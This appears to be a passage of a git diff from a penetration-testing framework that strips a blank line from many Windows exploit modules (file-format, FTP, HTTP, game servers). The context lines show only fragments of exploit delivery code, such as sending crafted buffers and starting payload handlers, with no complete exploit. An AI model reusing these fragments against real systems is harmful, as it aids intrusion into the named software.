a/modules/exploits/windows/fileformat/varicad_dwb.rb +++ b/modules/exploits/windows/fileformat/varicad_dwb.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(header + sploit) end - end diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb index 39507ffafd..f55e6cce06 100644 --- a/modules/exploits/windows/fileformat/videolan_tivo.rb +++ b/modules/exploits/windows/fileformat/videolan_tivo.rb @@ -85,5 +85,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(ty) end - end diff --git a/modules/exploits/windows/fileformat/videospirit_visprj.rb b/modules/exploits/windows/fileformat/videospirit_visprj.rb index b852583ca3..ff9dc18c58 100644 --- a/modules/exploits/windows/fileformat/videospirit_visprj.rb +++ b/modules/exploits/windows/fileformat/videospirit_visprj.rb @@ -237,5 +237,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(filecontent) end - end diff --git a/modules/exploits/windows/fileformat/visio_dxf_bof.rb b/modules/exploits/windows/fileformat/visio_dxf_bof.rb index 8612cacc71..83e0255a2a 100644 --- a/modules/exploits/windows/fileformat/visio_dxf_bof.rb +++ b/modules/exploits/windows/fileformat/visio_dxf_bof.rb @@ -118,5 +118,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating #{datastore['FILENAME']} ...") file_create(content) end - end diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb index 3f34f84b2e..977c563099 100644 --- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb +++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb @@ -125,5 +125,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}'...") file_create(vwr_data) end - end diff --git a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb index 43f971acdf..38edc7093f 100644 --- a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb +++ b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb @@ -305,5 +305,4 @@ EOS fail_with(Failure::Unknown, "Unable to locate key: \"#{key}\"") if not rvas[key] rvas['BaseAddress'] + rvas[key] end - end diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index b270caa41a..6425b13cc5 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -114,5 +114,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb index 5275aa7590..4e4620a099 100644 --- a/modules/exploits/windows/fileformat/vuplayer_cue.rb +++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(cue) end - end diff --git a/modules/exploits/windows/fileformat/winamp_maki_bof.rb b/modules/exploits/windows/fileformat/winamp_maki_bof.rb index 2fb289139d..3c27013f33 100644 --- a/modules/exploits/windows/fileformat/winamp_maki_bof.rb +++ b/modules/exploits/windows/fileformat/winamp_maki_bof.rb @@ -101,5 +101,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(maki) end - end diff --git a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb index beb12ff9ba..70836f172f 100644 --- a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb +++ b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file...") file_create(pack) end - end diff --git a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb index a61f85a011..f226fa2f42 100644 --- a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb +++ b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb index 142b14cc4e..4dd3224080 100644 --- a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb +++ b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb index d7f0a2b47d..6608f30f0c 100644 --- a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb +++ b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(buffer) end - end diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index d31d08257b..1a96d4a766 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(filepls) end - end diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index 2e6264897b..8781ce13fc 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -128,5 +128,4 @@ class MetasploitModule < Msf::Exploit::Remote select(nil,nil,nil,5) } end - end diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb index 9cc177f694..2c97ccbd5d 100644 --- a/modules/exploits/windows/firewall/kerio_auth.rb +++ b/modules/exploits/windows/firewall/kerio_auth.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/32bitftp_list_reply.rb b/modules/exploits/windows/ftp/32bitftp_list_reply.rb index 72d911d5a4..3385a983ba 100644 --- a/modules/exploits/windows/ftp/32bitftp_list_reply.rb +++ b/modules/exploits/windows/ftp/32bitftp_list_reply.rb @@ -100,5 +100,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status(" - LIST sent, wait for user to double click file...") return end - end diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index e5f1d806fa..234edc1ff9 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -124,5 +124,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/aasync_list_reply.rb b/modules/exploits/windows/ftp/aasync_list_reply.rb index 266e3fc0fa..eebeb50433 100644 --- a/modules/exploits/windows/ftp/aasync_list_reply.rb +++ b/modules/exploits/windows/ftp/aasync_list_reply.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status(" - Payload sent") return end - end diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index d4e9ea1b82..1ae967f10f 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index 038e80f003..d932960be5 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -190,5 +190,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index 70fafb95d0..99286bdde4 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index b576bf3aa7..6e74ffe2ca 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index a6a1653528..6fd981c012 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -118,5 +118,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index e487db140e..219e6bab11 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -114,5 +114,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb index e7504ff1bd..e114977ba3 100644 --- a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -118,5 +118,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index 9e0fa590e2..db804d9437 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -57,5 +57,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/filewrangler_list_reply.rb b/modules/exploits/windows/ftp/filewrangler_list_reply.rb index 763701eddd..faccc6f4a5 100644 --- a/modules/exploits/windows/ftp/filewrangler_list_reply.rb +++ b/modules/exploits/windows/ftp/filewrangler_list_reply.rb @@ -105,5 +105,4 @@ class MetasploitModule < Msf::Exploit::Remote return end - end diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb index 872e5ff330..7c0d5d571e 100644 --- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb +++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb @@ -151,5 +151,4 @@ class MetasploitModule < Msf::Exploit::Remote t.kill end end - end diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index 86c5d26d11..2da81e5422 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb index 4a3f5c083e..b3486cb735 100644 --- a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Wait for hunter ...") return end - end diff --git a/modules/exploits/windows/ftp/ftppad_list_reply.rb b/modules/exploits/windows/ftp/ftppad_list_reply.rb index 51f8a6e1bd..5e5692f774 100644 --- a/modules/exploits/windows/ftp/ftppad_list_reply.rb +++ b/modules/exploits/windows/ftp/ftppad_list_reply.rb @@ -88,5 +88,4 @@ class MetasploitModule < Msf::Exploit::Remote conn.close return end - end diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index 31744286f0..9d305ba789 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Exploit::Remote return end - end diff --git a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb index 1a10e1d0e6..a071972017 100644 --- a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb +++ b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Exploit::Remote conn.close return end - end diff --git a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb index 43328997c2..cda98608f2 100644 --- a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb +++ b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb @@ -102,5 +102,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status(" - Payload sent, wait for hunter...") return end - end diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 06ce210b5a..1936b6a879 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index 009cbe8884..2a5641fcc5 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -208,7 +208,6 @@ For now, that will have to be done manually. print_status("Please be patient, the egg hunter may take a while...") connect end - end diff --git a/modules/exploits/windows/ftp/leapftp_list_reply.rb b/modules/exploits/windows/ftp/leapftp_list_reply.rb index 824d7e0e35..90ee2dd527 100644 --- a/modules/exploits/windows/ftp/leapftp_list_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_list_reply.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Exploit::Remote conn.close return end - end diff --git a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb index 46ebc5d63f..faa9eb3912 100644 --- a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb +++ b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb @@ -165,5 +165,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index f7535a9ce9..83a4917fb8 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -101,5 +101,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/odin_list_reply.rb b/modules/exploits/windows/ftp/odin_list_reply.rb index afe59385b0..3c3704fc5e 100644 --- a/modules/exploits/windows/ftp/odin_list_reply.rb +++ b/modules/exploits/windows/ftp/odin_list_reply.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote return end - end diff --git a/modules/exploits/windows/ftp/open_ftpd_wbem.rb b/modules/exploits/windows/ftp/open_ftpd_wbem.rb index a0f2481751..ae7993367a 100644 --- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb +++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb @@ -147,5 +147,4 @@ class MetasploitModule < Msf::Exploit::Remote t.kill end end - end diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index ed513018f3..058ab49d45 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index fee77e10d7..13f4e557a2 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/pcman_put.rb b/modules/exploits/windows/ftp/pcman_put.rb index 049bb07434..b303fa1142 100644 --- a/modules/exploits/windows/ftp/pcman_put.rb +++ b/modules/exploits/windows/ftp/pcman_put.rb @@ -74,5 +74,4 @@ class MetasploitModule < Msf::Exploit::Remote send_cmd( ["PUT", sploit], false ) disconnect end - end diff --git a/modules/exploits/windows/ftp/pcman_stor.rb b/modules/exploits/windows/ftp/pcman_stor.rb index c10bd68901..f5503ec7c3 100644 --- a/modules/exploits/windows/ftp/pcman_stor.rb +++ b/modules/exploits/windows/ftp/pcman_stor.rb @@ -89,5 +89,4 @@ class MetasploitModule < Msf::Exploit::Remote send_cmd( ["STOR", "/../" + sploit], false ) disconnect end - end diff --git a/modules/exploits/windows/ftp/proftp_banner.rb b/modules/exploits/windows/ftp/proftp_banner.rb index fe3ef637d9..fcac811dc8 100644 --- a/modules/exploits/windows/ftp/proftp_banner.rb +++ b/modules/exploits/windows/ftp/proftp_banner.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Exploit::Remote buffer << "\r\n" client.put(buffer) end - end diff --git a/modules/exploits/windows/ftp/quickshare_traversal_write.rb b/modules/exploits/windows/ftp/quickshare_traversal_write.rb index 82975b088c..cf3370ebf0 100644 --- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb +++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb @@ -158,5 +158,4 @@ class MetasploitModule < Msf::Exploit::Remote t.kill end end - end diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index 668a5e579b..5331ce5b8c 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote send_cmd( ['LIST', buf], false ) disconnect end - end diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 773657a155..e8aaf32695 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index a3be6a869f..02275ad62d 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -61,5 +61,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index 9dd5c28969..8dfefffea5 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -170,5 +170,4 @@ class MetasploitModule < Msf::Exploit::Remote conn.close return end - end diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index a3bfa6be94..6dcb63d963 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status(" - Wait for omelet hunter...") return end - end diff --git a/modules/exploits/windows/ftp/servu_chmod.rb b/modules/exploits/windows/ftp/servu_chmod.rb index 78fe8ea7dd..63a0a49c98 100644 --- a/modules/exploits/windows/ftp/servu_chmod.rb +++ b/modules/exploits/windows/ftp/servu_chmod.rb @@ -90,5 +90,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index cb107ff786..ab9cbc5b48 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -180,5 +180,4 @@ class MetasploitModule < Msf::Exploit::Remote res = send_cmd( ['P@SW'], true ) return (res and res =~ /^500/) ? true : false end - end diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index 17d1b1f6e3..bb9e7e5047 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb index a70937ae9b..28d11bd435 100644 --- a/modules/exploits/windows/ftp/trellian_client_pasv.rb +++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote client.put(sploit) end - end diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb index 81e8153a86..c48e5507d2 100644 --- a/modules/exploits/windows/ftp/turboftp_port.rb +++ b/modules/exploits/windows/ftp/turboftp_port.rb @@ -190,5 +190,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index 9a4d7033c4..8349425d2d 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -157,7 +157,6 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 7a1886e304..89dc4546b8 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -75,5 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index 215b2c3cda..2da238ae0b 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb @@ -85,5 +85,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index 2d45a51abd..7807ec3e9e 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/winaxe_server_ready.rb b/modules/exploits/windows/ftp/winaxe_server_ready.rb index 91f7c27187..dfae81f501 100644 --- a/modules/exploits/windows/ftp/winaxe_server_ready.rb +++ b/modules/exploits/windows/ftp/winaxe_server_ready.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote c.put("220" + sploit + "\r\n") c.close end - end diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index 44386886b3..3da769a231 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -75,5 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index b72f062e28..6b436001c0 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ftp/xftp_client_pwd.rb b/modules/exploits/windows/ftp/xftp_client_pwd.rb index 413a344fc8..f4637c2ca9 100644 --- a/modules/exploits/windows/ftp/xftp_client_pwd.rb +++ b/modules/exploits/windows/ftp/xftp_client_pwd.rb @@ -88,5 +88,4 @@ class MetasploitModule < Msf::Exploit::Remote client.get_once end - end diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index 38eb9130af..1a97978567 100644 --- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index 49ca90bcbc..fd71d2cb8c 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect_udp end - end diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index bb105286db..4b4996ab0b 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("This system appears to be patched") return Exploit::CheckCode::Safe end - end diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index 068eaa7c62..80d35d1097 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb @@ -123,5 +123,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/altn_webadmin.rb b/modules/exploits/windows/http/altn_webadmin.rb index e3c60a6599..5a15cd0336 100644 --- a/modules/exploits/windows/http/altn_webadmin.rb +++ b/modules/exploits/windows/http/altn_webadmin.rb @@ -103,5 +103,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index d6af5213e2..cdda43e475 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -312,5 +312,4 @@ class MetasploitModule < Msf::Exploit::Remote handler } end - end diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index c28b6c9159..8e042434da 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -98,5 +98,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb index 465f824b8b..ce53f84a37 100644 --- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb +++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb @@ -175,5 +175,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index 4358ca48dc..094d5a715a 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index 7cb7b4ceb2..3474d80188 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 5d783e0beb..372649f3b8 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb index fa3c33b6d4..5d6c33a354 100644 --- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb +++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb @@ -182,5 +182,4 @@ class MetasploitModule < Msf::Exploit::Remote return "BEA WebLogic connector not found" end - end diff --git 